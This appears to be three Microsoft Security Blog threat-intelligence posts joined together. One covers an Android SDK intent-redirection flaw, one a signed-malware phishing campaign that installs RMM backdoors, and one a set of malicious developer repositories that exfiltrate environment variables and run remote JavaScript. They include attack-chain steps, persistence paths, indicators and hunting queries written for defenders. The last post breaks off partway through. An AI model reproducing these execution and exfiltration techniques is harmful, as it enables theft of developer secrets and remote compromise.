During routine security research, we identified a severe intent redirection vulnerability in a widely used third-party Android SDK called EngageSDK. This flaw allows apps on the same device to bypass Android security sandbox and gain unauthorized access to private data. With over 30 million installations of third-party crypto wallet applications alone, the exposure of PII, user credentials and financial data were exposed to risk. All of the detected apps using vulnerable versions have been removed from Google Play.

Following our Coordinated Vulnerability Disclosure practices (via Microsoft Security Vulnerability Research), we notified EngageLab and the Android Security Team. We collaborated with all parties to investigate and validate the issue, which was resolved as of November 3, 2025 in version 5.2.1 of the EngageSDK. This case shows how weaknesses in third‑party SDKs can have large‑scale security implications, especially in high‑value sectors like digital asset management. 

As of the time of writing, we are not aware of any evidence indicating that this vulnerability has been exploited in the wild. Nevertheless, we strongly recommend that developers who integrate the affected SDK upgrade to the latest available version. While this is a vulnerability introduced by a third-party SDK, Android’s existing layered security model is capable of providing additional mitigations against exploitation of vulnerabilities through intents. Android has updated these automatic user protections to provide additional mitigation against the specific EngageSDK risks described in this report while developers update to the non-vulnerable version of EngageSDK. Users who previously downloaded a vulnerable app are protected.

In this blog, we provide a technical analysis of a vulnerability that bypasses core Android security mechanisms. We also examine why this issue is significant in the current landscape: apps increasingly rely on third‑party SDKs, creating large and often opaque supply‑chain dependencies.  

As mobile wallets and other high‑value apps become more common, even small flaws in upstream libraries can impact millions of devices. These risks increase when integrations expose exported components or rely on trust assumptions that aren’t validated across app boundaries. 

Because Android apps frequently depend on external libraries, insecure integrations can introduce attack surfaces into otherwise secure applications. We provide resources for three key audiences: 

• Developers: In addition to the best practices Android provides its developers, we provide practical guidance on identifying and preventing similar flaws, including how to review dependencies and validate exported components.  
• Researchers: Insights into how we discovered the issue and the methodology we used to confirm its impact.  
• General readers: An explanation of the implications of this vulnerability and why ecosystem‑wide vigilance is essential. 

This analysis reflects Microsoft’s visibility into cross‑platform security threats. We are committed to safeguarding users, even in environments and applications that Microsoft does not directly build or operate.  You can find a detailed set of recommendations, detection guidance and indicators at the end of this post to help you assess exposure and strengthen protections.

Technical details

The Android operating system integrates a variety of security mechanisms, such as memory isolation, filesystem discretionary and mandatory access controls (DAC/MAC), biometric authentication, and network traffic encryption. Each of these components functions according to its own security framework, which may not always align with the others_[1].  

Unlike many other operating systems where applications run with the user’s privileges, Android assigns each app with a unique user ID and executes it within its own sandboxed environment. Each app has a private directory for storing data that is not meant to be shared. By default, other apps cannot access this private space unless the owning app explicitly exposes data through components known as content providers.  

To facilitate communication between applications, Android uses intents_[2]. Beyond inter-app messaging, intents also enable interaction among components within the same application as well as data sharing between those components. 

It’s worth noting that while any application can send an intent to another app or component, whether that intent is actually delivered—and more broadly, whether the communication is permitted—depends on the identity and permissions of the sending application.  

Intent redirection vulnerability 

Intent Redirection occurs when a threat actor manipulates the contents of an intent that a vulnerable app sends using its own identity and permissions.  

In this scenario, the threat actor leverages the trusted context of the affected app to run a malicious payload with the app’s privileges. This can lead to: 

• Unauthorized access to protected components  
• Exposure of sensitive data 
• Privilege escalation within the Android environment

Android Security Team classifies this vulnerability as severe. Apps flagged as vulnerable are subject to enforcement actions, including potential removal from the platform_[3].

EngageLab SDK intent redirection

Developers use the EngageLab SDK to manage messaging and push notifications in mobile apps. It functions as a library that developers integrate into Android apps as a dependency. Once included, the SDK provides APIs for handling communication tasks, making it a core component for apps that require real-time engagement.

The vulnerability was identified in an exported activity (MTCommonActivity) that gets added to an application’s Android manifest once the library is imported into a project, after the build process. This activity only appears in the merged manifest, which is generated post-build (see figure below), and therefore is sometimes missed by developers. Consequently, it often escapes detection during development but remains exploitable in the final APK.

When an activity is declared as exported in the Android manifest, it becomes accessible to other applications installed on the same device. This configuration permits any other application to explicitly send an intent to this activity.   

The following section outlines the intent handling process from the moment the activity receives an intent to when it dispatches one under the affected application’s identity. 

Intent processing in the vulnerable activity 

When an activity receives an intent, its response depends on its current lifecycle state: 

• If the activity is starting for the first time, the onCreate() method runs.  
• If the activity is already active, the onNewIntent() method runs instead.  

In the vulnerable MTCommonActivity, both callbacks invoke the processIntent() method. 

This method (see figure below) begins by initializing the uri variable on line 10 using the data provided in the incoming intent. If the uri variable is not empty, then – according to line 16 – it invokes the processPlatformMessage():  

The processPlatformMessage() method instantiates a JSON object using the uri string supplied as an argument to this method (see line 32 below):  

Each branch of the if statement checks the JSON object for a field named n_intent_uri. If this field exists, the method performs the following actions: 

• Creates a NotificationMessage object  
• Initializes its intentUri field by using the appropriate setter (see line 52).  

An examination of the intentUri field in the NotificationMessage class identified the following method as a relevant point of reference:

On line 353, the method above obtains the intentUri value and attempts to create a new intent from it by calling the method a() on line 360. The returned intent is subsequently dispatched using the startActivity() method on line 365. The a() method is particularly noteworthy, as it serves as the primary mechanism responsible for intent redirection:

This method appears to construct an implicit intent by invoking setComponent(), which clears the target component of the parseUri intent by assigning a null value (line 379). Under normal circumstances, such behavior would result in a standard implicit intent, which poses minimal risk because it does not specify a concrete component and therefore relies on the system’s resolution logic.  

However, as observed on line 377, the method also instantiates a second intent variable — its purpose not immediately evident—which incorporates an explicit intent. Crucially, this explicitly targeted intent is the one returned at line 383, rather than the benign parseUri intent.  

Another notable point is that the parseUri() method (at line 376)   is called with the URI_ALLOW_UNSAFE flag (constant value 4), which can permit access to an application’s content providers [6] (see exploitation example below). 

These substitutions fundamentally alter the method’s behavior: instead of returning a non‑directed, system‑resolved implicit intent, it returns an intent with a predefined component, enabling direct invocation of the targeted activity as well as access to the application’s content providers. As noted previously, this vulnerability can, among other consequences, permit access to the application’s private directory by gaining entry through any available content providers, even those that are not exported.

Exploitation starts when a malicious app creates an intent object with a crafted URI in the extra field. The vulnerable app then processes this URI, creating and sending an intent using its own identity and permissions. 

Due to the URI_ALLOW_UNSAFE flag, the intent URI may include the following flags; 

• FLAG_GRANT_PERSISTABLE_URI_PERMISSION 
• FLAG_GRANT_READ_URI_PERMISSION  
• FLAG_GRANT_WRITE_URI_PERMISSION 

When combined, these flags grant persistent read and write access to the app’s private data.  

After the vulnerable app processes the intent and applies these flags, the malicious app is authorized to interact with the target app’s content provider. This authorization remains active until the target app explicitly revokes it [5]. As a result, the internal directories of the vulnerable app are exposed, which allows unauthorized access to sensitive data in its private storage space.  The following image illustrates an example of an exploitation intent:

Affected applications  

A significant number of apps using this SDK are part of the cryptocurrency and digital‑wallet ecosystem. Because of this, the consequences of this vulnerability are especially serious. Before notifying the vendor, Microsoft confirmed the flaw in multiple apps on the Google Play Store.

The affected wallet applications alone accounted for more than 30 million installations, and when including additional non‑wallet apps built on the same SDK, the total exposure climbed to over 50 million installations.  

Disclosure timeline

Microsoft initially identified the vulnerability in version 4.5.4 of the EngageLab SDK. Following Coordinated Vulnerability Disclosure (CVD) practices through Microsoft Security Vulnerability Research (MSVR), the issue was reported to EngageLab in April 2025. Additionally, Microsoft notified the Android Security Team because the affected apps were distributed through the Google Play Store.  

EngageLab addressed the vulnerability in version 5.2.1, released on November 3, 2025. In the fixed version, the vulnerable activity is set to non-exported, which prevents it from being invoked by other apps. 

Mitigation and protection guidance

Android developers utilizing the EngageLab SDK are strongly advised to upgrade to the latest version promptly. 

Our research indicates that integrating external libraries can inadvertently introduce features or components that may compromise application security. Specifically, adding an exported component to the merged Android manifest could be unintentionally overlooked, resulting in potential attack surfaces. To keep your apps secure, always review the merged Android manifest, especially when you incorporate third‑party SDKs. This helps you identify any components or permissions that might affect your app’s security or behavior.

Keep your users and applications secure

Strengthening mobile‑app defenses doesn’t end with understanding this vulnerability.

Take the next step: 

• Strengthen your defenses with Microsoft Defender XDR 
• Accelerate investigations with Microsoft Security Copilot 

Learn more about Microsoft’s Security Vulnerability Research (MSVR) program at http://approjects.co.za/?big=en-us/msrc/msvr

References

[1] Mayrhofer, René, Jeffrey Vander Stoep, Chad Brubaker, Dianne Hackborn, Bram Bonné, Güliz Seray Tuncay, Roger Piqueras Jover, and Michael A. Specter. The Android Platform Security Model (2023). ACM Transactions on Privacy and Security, vol. 24, no. 3, 2021, pp. 1–35. arXiv:1904.05572. https://doi.org/10.48550/arXiv.1904.05572.  

[2] https://developer.android.com/guide/components/intents-filters  

[3] https://support.google.com/faqs/answer/9267555?hl=en  

[4] https://www.engagelab.com/docs/  

[5] https://developer.android.com/reference/android/content/Intent#FLAG_GRANT_PERSISTABLE_URI_PERMISSION 

[6] https://developer.android.com/reference/android/content/Intent#URI_ALLOW_UNSAFE

This research is provided by Microsoft Defender Security Research with contributions from Dimitrios Valsamaras and other members of Microsoft Threat Intelligence.

Learn more

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

• Evaluate your AI readiness with our latest Zero Trust for AI workshop.
• Learn more about Protect your agents in real-time during runtime (Preview)
• Explore how to build and customize agents with Copilot Studio Agent Builder 
• Microsoft 365 Copilot AI security documentation 
• How Microsoft discovers and mitigates evolving attacks against AI guardrails 
• Learn more about securing Copilot Studio agents with Microsoft Defender  

The post Intent redirection vulnerability in third-party SDK exposed millions of Android wallets to potential risk appeared first on Microsoft Security Blog.

In February 2026, Microsoft Defender Experts identified multiple phishing campaigns attributed to an unknown threat actor. The campaigns used workplace meeting lures, PDF attachments, and abuse of legitimate binaries to deliver signed malware.

Phishing emails directed users to download malicious executables masquerading as legitimate software. The files were digitally signed using an Extended Validation (EV) certificate issued to TrustConnect Software PTY LTD. Once executed, the applications installed remote monitoring and management (RMM) tools that enabled the attacker to establish persistent access on compromised systems.

These campaigns demonstrate how familiar branding and trusted digital signatures can be abused to bypass user suspicion and gain an initial foothold in enterprise environments.

Attack chain overview

Based on Defender telemetry, Microsoft Defender Experts conducted forensic analysis that identified a campaign centered on deceptive phishing emails delivering counterfeit PDF attachments or links impersonating meeting invitations, financial documents, invoices, and organizational notifications.

The lures directed users to download malicious executables masquerading as legitimate software, including msteams.exe, trustconnectagent.exe, adobereader.exe, zoomworkspace.clientsetup.exe, and invite.exe. These files were digitally signed using an Extended Validation certificate issued to TrustConnect Software PTY LTD.

Once executed, the applications deployed remote monitoring and management tools such as ScreenConnect, Tactical RMM, and Mesh Agent. These tools enabled the attacker to establish persistence and move laterally within the compromised environment.

Campaign delivering PDF attachments

In one observed campaign, victims received the following email which included a fake PDF attachment that when opened shows the user a blurred static image designed to resemble a restricted document.

A red button labeled “Open in Adobe” encouraged the user to click to continue to access the file. However, when clicked instead of displaying the document, the button redirects users to a spoofed webpage crafted to closely mimic Adobe’s official download center.

The screenshot shows that the user’s Adobe Acrobat is out of date and automatically begins downloading what appears to be a legitimate update masquerading as AdobeReader but it is an RMM software package digitally signed by TrustConnect Software PTY LTD.

Campaign delivering meeting invitations

In another observed campaign, the threat actor was observed distributing highly convincing Teams and Zoom phishing emails that mimic legitimate meeting requests, project bids, and financial communications.

These messages contained embedded phishing links that led users to download software impersonating trusted applications. The fraudulent sites displayed “out of date” or “update required” prompts designed to induce rapid user action. The resulting downloads masqueraded as Teams, Zoom, or Google Meet installer were in fact remote monitoring and management (RMM) software once again digitally signed by TrustConnect Software PTY LTD.

ScreenConnect RMM backdoor installation

Once the masqueraded Workspace application (digitally signed by TrustConnect) was executed from the Downloads directory, it created a secondary copy of itself under C:\Program Files. This behavior was intended to reinforce its appearance as a legitimate, system-installed application. The program then registered the copied executable as a Windows service, enabling persistent and stealthy execution during system startup.

As part of its persistence mechanism, the service also created a Run key located at: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: TrustConnectAgent

This Run key was configured to automatically launch the disguised executable:       C:\Program Files\Adobe Acrobat Reader\AdobeReader.exe

At this stage, the service established an outbound network connection to the attacker-controlled Command and Control (C2) domain: trustconnectsoftware[.]com

Following the installation phase, the masqueraded workplace executables (TrustConnect RMM) initiated encoded PowerShell commands designed to download additional payloads from the attacker-controlled infrastructure.

These PowerShell commands retrieved the ScreenConnect client installer files (.msi) and staged them within the systems’ temporary directory paths in preparation for secondary deployment. Subsequently, the Windows msiexec.exe utility was invoked to execute the staged installer files. This process results in the full installation of the ScreenConnect application and the creation of multiple registry entries to ensure ongoing persistence.

In this case, the activity possibly involved the on-premises version of ScreenConnect delivered through an MSI package that was not digitally signed by ConnectWise. On-premises version of ScreenConnect MSI installers are unsigned by default. As such, encountering an unsigned installer in a malicious activity often suggests it’s a potentially obtained through unauthorized means.

Review of the ScreenConnect binaries dropped during execution of ScreenConnect installer files showed that the associated executable files were signed with certificates that had already been revoked. This pattern—unsigned installer followed by executables bearing invalidated signatures—has been consistently observed in similar intrusions.

Analysis of the registry artifacts indicated that the installed backdoor created and maintained multiple ScreenConnect Client related registry values across several Windows registry locations, embedding itself deeply within the operating system. Persistence through Windows services was reinforced by entries placed under:

HKLM\SYSTEM\ControlSet001\Services\ScreenConnect Client [16digit unique hexadecimal client identifier]

Within the service key, command strings instructed the client on how to reconnect to the remote operator’s infrastructure. These embedded parameters included encoded identifiers, callback tokens, and connection metadata, all of which enable seamless reestablishment of remote access following system restarts or service interruptions.

Additional registry entries observed during analysis further validate this persistence strategy. The configuration strings reference the executable ScreenConnect.ClientService.exe, located in:

C:\Program Files (x86)\ScreenConnect Client [Client ID]

These entries contained extensive encoded payloads detailing server addresses, session identifiers, and authentication parameters. Such configuration depth ensures that the ScreenConnect backdoor maintained:

• Reliable persistence
• Operational stealth
• Continuous C2 availability

The combination of service-based autoruns, encoded reconnection parameters, and deep integration into critical system service keys demonstrates a deliberate design optimized for long term, covert remote access. These characteristics are consistent with a repurposed ScreenConnect backdoor, rather than a benign or legitimate Remote Monitoring and Management (RMM) deployment.

Additional RMM installation

During analysis we identified that the threat actor did not rely solely on the malicious ScreenConnect backdoor to maintain access. In parallel, the actor deployed additional remote monitoring and management (RMM) tools to strengthen foothold redundancy and expand control across the environment. The masqueraded Workplace executables associated with the TrustConnect RMM initiated a series of encoded PowerShell commands. This technique, which was also used to deploy ScreenConnect, enabled the download and installation of Tactical RMM from the attacker-controlled infrastructure. As part of this secondary installation, the Tactical RMM deployment subsequently installed MeshAgent, providing yet another remote access channel for persistence.

The use of multiple RMM frameworks within a single intrusion demonstrates a deliberate strategy to ensure continuous access, diversify C2 capabilities, and maintain operational resilience even if one access mechanism is detected or removed.

Mitigation and protection guidance

Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

• Follow the recommendations within the Microsoft Technique Profile: Abuse of remote monitoring and management tools to mitigate the use of unauthorized RMMs in the environment.
• Use Windows Defender Application Control or AppLocker to create policies to block unapproved IT management tools
  • Both solutions include functionality to block specific software publisher certificates: WDAC file rule levels allow administrators to specify the level at which they want to trust their applications, including listing certificates as untrusted. AppLocker’s publisher rule condition is available for files that are digitally signed, which can enable organizations to block non-approved RMM instances that include publisher information.
  • Microsoft Defender for Endpoint also provides functionality to block specific signed applications using the block certificate action.
• For approved RMM systems used in your environment, enforce security settings where it is possible to implement multifactor authentication (MFA).
• Consider searching for unapproved RMM software installations (see the Advanced hunting section). If an unapproved installation is discovered, reset passwords for accounts used to install the RMM services. If a system-level account was used to install the software, further investigation may be warranted.
• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
• Turn on Safe Links and Safe Attachments in Microsoft Defender for Office 365.
• Enable Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
• Microsoft Defender XDR customers can turn on the following attack surface reduction rules to prevent common attack techniques used by threat actors:
  • Use advanced protection against ransomware
  • Block process creations originating from PsExec and WMI commands. Some organizations may experience compatibility issues with this rule on certain server systems but should deploy it to other systems to prevent lateral movement originating from PsExec and WMI.
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion
• You can assess how an attack surface reduction rule might impact your network by opening the security recommendation for that rule in threat and vulnerability management. In the recommendation details pane, check the user impact to determine what percentage of your devices can accept a new policy enabling the rule in blocking mode without adverse impact to user productivity.

Microsoft Defender XDR detections   

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Hunting queries 

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their environment:

Use the below query to discover files digitally signed by TrustConnect Software PTY LDT

DeviceFileCertificateInfo
| where Issuer == "TrustConnect Software PTY LTD" or Signer == "TrustConnect Software PTY LTD"
| join kind=inner (
    DeviceFileEvents
    | project SHA1, FileName, FolderPath, DeviceName, TimeGenerated
) on SHA1
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA1, Issuer, Signer

Use the below query to identify the presence of masqueraded workplace applications

let File_Hashes_SHA256 = dynamic([
"ef7702ac5f574b2c046df6d5ab3e603abe57d981918cddedf4de6fe41b1d3288", "4c6251e1db72bdd00b64091013acb8b9cb889c768a4ca9b2ead3cc89362ac2ca", 
"86b788ce9379e02e1127779f6c4d91ee4c1755aae18575e2137fb82ce39e100f", "959509ef2fa29dfeeae688d05d31fff08bde42e2320971f4224537969f553070", 
"5701dabdba685b903a84de6977a9f946accc08acf2111e5d91bc189a83c3faea", "6641561ed47fdb2540a894eb983bcbc82d7ad8eafb4af1de24711380c9d38f8b", 
"98a4d09db3de140d251ea6afd30dcf3a08e8ae8e102fc44dd16c4356cc7ad8a6", "9827c2d623d2e3af840b04d5102ca5e4bd01af174131fc00731b0764878f00ca", 
"edde2673becdf84e3b1d823a985c7984fec42cb65c7666e68badce78bd0666c0", "c6097dfbdaf256d07ffe05b443f096c6c10d558ed36380baf6ab446e6f5e2bc3", 
"947bcb782c278da450c2e27ec29cb9119a687fd27485f2d03c3f2e133551102e", "36fdd4693b6df8f2de7b36dff745a3f41324a6dacb78b4159040c5d15e11acb7", 
"35f03708f590810be88dfb27c53d63cd6bb3fb93c110ca0d01bc23ecdf61f983", "af651ebcacd88d292eb2b6cbbe28b1e0afd1d418be862d9e34eacbd65337398c", 
"c862dbcada4472e55f8d1ffc3d5cfee65d1d5e06b59a724e4a93c7099dd37357"]);
DeviceFileEvents
| where SHA256 has_any (File_Hashes_SHA256)

Use the below query to identify the malicious network connection

DeviceNetworkEvents
| where RemoteUrl has "trustconnectsoftware.com"

Use the below query to identify the suspicious executions of ScreenConnect Backdoor via PowerShell

DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("Invoke-WebRequest","-OutFile","Start-Process", "ScreenConnect", ".msi") or ProcessCommandLine has_all ("Invoke-WebRequest","-OutFile","Start-Process", "ScreenConnect", ".msi") 
| project-reorder Timestamp, DeviceId,DeviceName,InitiatingProcessCommandLine,ProcessCommandLine,InitiatingProcessParentFileName

Use the below query to identify the suspicious deployment of ScreenConnect and Tactical RMM

DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("ScreenConnect","Tactical RMM","access","guest") or ProcessCommandLine has_all ("ScreenConnect","Tactical RMM","access","guest")
| where InitiatingProcessCommandLine !has "screenconnect.com" and ProcessCommandLine !has "screenconnect.com"
| where InitiatingProcessParentFileName in ("services.exe", "Tactical RMM.exe")
| project-reorder Timestamp, DeviceId,DeviceName,InitiatingProcessCommandLine,ProcessCommandLine,InitiatingProcessParentFileName

Indicators of compromise

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI maps) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

References

• Intel Article – Microsoft Defender

This research is provided by Microsoft Defender Security Research with contributions from Sai Chakri Kandalai.

Learn more 

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

• Microsoft 365 Copilot AI security documentation 
• How Microsoft discovers and mitigates evolving attacks against AI guardrails 
• Learn more about securing Copilot Studio agents with Microsoft Defender  
• Learn more about Protect your agents in real-time during runtime (Preview) – Microsoft Defender for Cloud Apps | Microsoft Learn   
• Explore how to build and customize agents with Copilot Studio Agent Builder 

The post Signed malware impersonating workplace apps deploys RMM backdoors appeared first on Microsoft Security Blog.

During initial incident analysis, Defender telemetry surfaced a limited set of malicious repositories directly involved in observed compromises. Further investigation expanded the scope by reviewing repository contents, naming conventions, and shared coding patterns. These artifacts were cross-referenced against publicly available code-hosting platforms. This process uncovered additional related repositories that were not directly referenced in observed logs but exhibited the same execution mechanisms, loader logic, and staging infrastructure.

Across these repositories, the campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control. An initial lightweight registration stage establishes host identity and can deliver bootstrap code before pivoting to a separate controller that provides persistent tasking and in-memory execution. This design supports operator-driven discovery, follow-on payload delivery, and staged data exfiltration.

Initial discovery and scope expansion

The investigation began with analysis of suspicious outbound connections to attacker-controlled command-and-control (C2) infrastructure. Defender telemetry showed Node.js processes repeatedly communicating with related C2 IP addresses, prompting deeper review of the associated execution chains.

By correlating network activity with process telemetry, analysts traced the Node.js execution back to malicious repositories that served as the initial delivery mechanism. This analysis identified a Bitbucket-hosted repository presented as a recruiting-themed technical assessment, along with a related repository using the Cryptan-Platform-MVP1 naming convention.

From these findings, analysts expanded the scope by pivoting on shared code structure, loader logic, and repository naming patterns. Multiple repositories followed repeatable naming conventions and project “family” patterns, enabling targeted searches for additional related repositories that were not directly referenced in observed telemetry but exhibited the same execution and staging behavior.

Figure 1. Repository naming patterns and shared structure used to pivot from initial telemetry to additional related repositories 

Multiple execution paths leading to a shared backdoor 

Analysis of the identified repositories revealed three recurring execution paths designed to trigger during normal developer activity. While each path is activated by a different action, all ultimately converge on the same behavior: runtime retrieval and in‑memory execution of attacker‑controlled JavaScript. 

Path 1: Visual Studio Code workspace execution

Several repositories abuse Visual Studio Code workspace automation to trigger execution as soon as a developer opens (and trusts) the project. When present, .vscode/tasks.json is configured with runOn: “folderOpen”, causing a task to run immediately on folder open. In parallel, some variants include a dictionary-based fallback that contains obfuscated JavaScript processed during workspace initialization, providing redundancy if task execution is restricted. In both cases, the execution chain follows a fetch-and-execute pattern that retrieves a JavaScript loader from Vercel and executes it directly using Node.js.

``` 
node /Users/XXXXXX/.vscode/env-setup.js →  https://price-oracle-v2.vercel.app 
``` 

Figure 2. Telemetry showing a VS Code–adjacent Node script (.vscode/env-setup.js) initiating outbound access to a Vercel staging endpoint (price-oracle-v2.vercel[.]app). 

After execution, the script begins beaconing to attacker-controlled infrastructure. 

Path 2: Build‑time execution during application development 

The second execution path is triggered when the developer manually runs the application, such as with npm run dev or by starting the server directly. In these variants, malicious logic is embedded in application assets that appear legitimate but are trojanized to act as loaders. Common examples include modified JavaScript libraries, such as jquery.min.js, which contain obfuscated code rather than standard library functionality. 

When the development server starts, the trojanized asset decodes a base64‑encoded URL and retrieves a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js, resulting in the same backdoor behavior observed in other execution paths. This mechanism provides redundancy, ensuring execution even when editor‑based automation is not triggered. 

Telemetry shows development server execution immediately followed by outbound connections to Vercel staging infrastructure: 

``` 
node server/server.js  →  https://price-oracle-v2.vercel.app 
``` 

Figure 3. Telemetry showing node server/server.js reaching out to a Vercel-hosted staging endpoint (price-oracle-v2.vercel[.]app). 

The Vercel request consistently precedes persistent callbacks to attacker‑controlled C2 servers over HTTP on port 300.  

Path 3: Server startup execution via env exfiltration and dynamic RCE 

The third execution path activates when the developer starts the application backend. In these variants, malicious loader logic is embedded in backend modules or routes that execute during server initialization or module import (often at require-time). Repositories commonly include a .env value containing a base64‑encoded endpoint (for example, AUTH_API=<base64>), and a corresponding backend route file (such as server/routes/api/auth.js) that implements the loader. 

On startup, the loader decodes the endpoint, transmits the process environment (process.env) to the attacker-controlled server, and then executes JavaScript returned in the response using dynamic compilation (for example, new Function(“require”, response.data)(require)). This results in in‑memory remote code execution within the Node.js server process. 

``` 
Server start / module import 
→ decode AUTH_API (base64) 
→ POST process.env to attacker endpoint 
→ receive JavaScript source 
→ execute via new Function(...)(require) 
``` 

Figure 4. Backend server startup path where a module import decodes a base64 endpoint, exfiltrates environment variables, and executes server‑supplied JavaScript via dynamic compilation. 

This mechanism can expose sensitive configuration (cloud keys, database credentials, API tokens) and enables follow-on tasking even in environments where editor-based automation or dev-server asset execution is not triggered. 

Stage 1 C2 beacon and registration 

Regardless of the initial execution path, whether opening the project in Visual Studio Code, running the development server, or starting the application backend, all three mechanisms lead to the same Stage 1 payload. Stage 1 functions as a lightweight registrar and bootstrap channel.

After being retrieved from staging infrastructure, the script profiles the host and repeatedly polls a registration endpoint at a fixed cadence. The server response can supply a durable identifier, instanceId, that is reused across subsequent polls to correlate activity. Under specific responses, the client also executes server-provided JavaScript in memory using dynamic compilation, new Function(), enabling on-demand bootstrap without writing additional payloads to disk. 

Stage 2 C2 controller and tasking loader 

Stage 2 upgrades the initial foothold into a persistent, operator-controlled tasking client. Unlike Stage 1, Stage 2 communicates with a separate C2 IP and API set that is provided by the Stage 1 bootstrap. The payload commonly runs as an inline script executed via node -e, then remains active as a long-lived control loop. 

Stage 2 polls a tasking endpoint and receives a messages[] array of JavaScript tasks. The controller maintains session state across rounds, can rotate identifiers during tasking, and can honor a kill switch when instructed. 

After receiving tasks, the controller executes them in memory using a separate Node interpreter, which helps reduce additional on-disk artifacts. 

The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint, and includes retry logic for resilience. It also tracks spawned processes and can stop managed activity and exit cleanly when instructed. 

Beyond on-demand code execution, Stage 2 supports operator-driven discovery and exfiltration. Observed operations include directory browsing through paired enumeration endpoints: 

 Staged upload workflow (upload, uploadsecond, uploadend) used to transfer collected files: 

Summary

This developer‑targeting campaign shows how a recruiting‑themed “interview project” can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend. The objective is to gain execution on developer systems that often contain high‑value assets such as source code, environment secrets, and access to build or cloud resources.

When untrusted assessment projects are run on corporate devices, the resulting compromise can expand beyond a single endpoint. The key takeaway is that defenders should treat developer workflows as a primary attack surface and prioritize visibility into unusual Node execution, unexpected outbound connections, and follow‑on discovery or upload behavior originating from development machines 

Cyber kill chain model 

Mitigation and protection guidance  

What to do now if you’re affected  

• If a developer endpoint is suspected of running this repository chain, the immediate priority is containment and scoping. Use endpoint telemetry to identify the initiating process tree, confirm repeated short-interval polling to suspicious endpoints, and pivot across the fleet to locate similar activity using Advanced Hunting tables such as DeviceNetworkEvents or DeviceProcessEvents.

• Because post-execution behavior includes credential and session theft patterns, response should include identity risk triage and session remediation in addition to endpoint containment. Microsoft Entra ID Protection provides a structured approach to investigate risky sign-ins and risky users and to take remediation actions when compromise is suspected. 

• If there is concern that stolen sessions or tokens could be used to access SaaS applications, apply controls that reduce data movement while the investigation proceeds. Microsoft Defender for Cloud Apps Conditional Access app control can monitor and control browser sessions in real time, and session policies can restrict high-risk actions to reduce exfiltration opportunities during containment. 

Defending against the threat or attack being discussed  

• Harden developer workflow trust boundaries. Visual Studio Code Workspace Trust and Restricted Mode are designed to prevent automatic code execution in untrusted folders by disabling or limiting tasks, debugging, workspace settings, and extensions until the workspace is explicitly trusted. Organizations should use these controls as the default posture for repositories acquired from unknown sources and establish policy to review workspace automation files before trust is granted.  

• Reduce build time and script execution attack surface on Windows endpoints. Attack surface reduction rules in Microsoft Defender for Endpoint can constrain risky behaviors frequently abused in this campaign class, such as running obfuscated scripts or launching suspicious scripts that download or run additional content. Microsoft provides deployment guidance and a phased approach for planning, testing in audit mode, and enforcing rules at scale.  

• Strengthen prevention on Windows with cloud delivered protection and reputation controls. Microsoft Defender Antivirus cloud protection provides rapid identification of new and emerging threats using cloud-based intelligence and is recommended to remain enabled. Microsoft Defender SmartScreen provides reputation-based protection against malicious sites and unsafe downloads and can help reduce exposure to attacker infrastructure and socially engineered downloads.  

• Protect identity and reduce the impact of token theft. Since developer systems often hold access to cloud resources, enforce strong authentication and conditional access, monitor for risky sign ins, and operationalize investigation playbooks when risk is detected. Microsoft Entra ID Protection provides guidance for investigating risky users and sign ins and integrating results into SIEM workflows.  

• Control SaaS access and data exfiltration paths. Microsoft Defender for Cloud Apps Conditional Access app control supports access and session policies that can monitor sessions and restrict risky actions in real time, which is valuable when an attacker attempts to use stolen tokens or browser sessions to access cloud apps and move data. These controls can complement endpoint controls by reducing exfiltration opportunities at the cloud application layer. [learn.microsoft.com], [learn.microsoft.com] 

• Centralize monitoring and hunting in Microsoft Sentinel. For organizations using Microsoft Sentinel, hunting queries and analytics rules can be built around the observable behaviors described in this blog, including Node.js initiating repeated outbound connections, HTTP based polling to attacker endpoints, and staged upload patterns. Microsoft provides guidance for creating and publishing hunting queries in Sentinel, which can then be operationalized into detections.  

• Operational best practices for long term resilience. Maintain strict credential hygiene by minimizing secrets stored on developer endpoints, prefer short lived tokens, and separate production credentials from development workstations. Apply least privilege to developer accounts and build identities, and segment build infrastructure where feasible. Combine these practices with the controls above to reduce the likelihood that a single malicious repository can become a pathway into source code, secrets, or deployment systems. 

Microsoft Defender XDR detections   

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.  

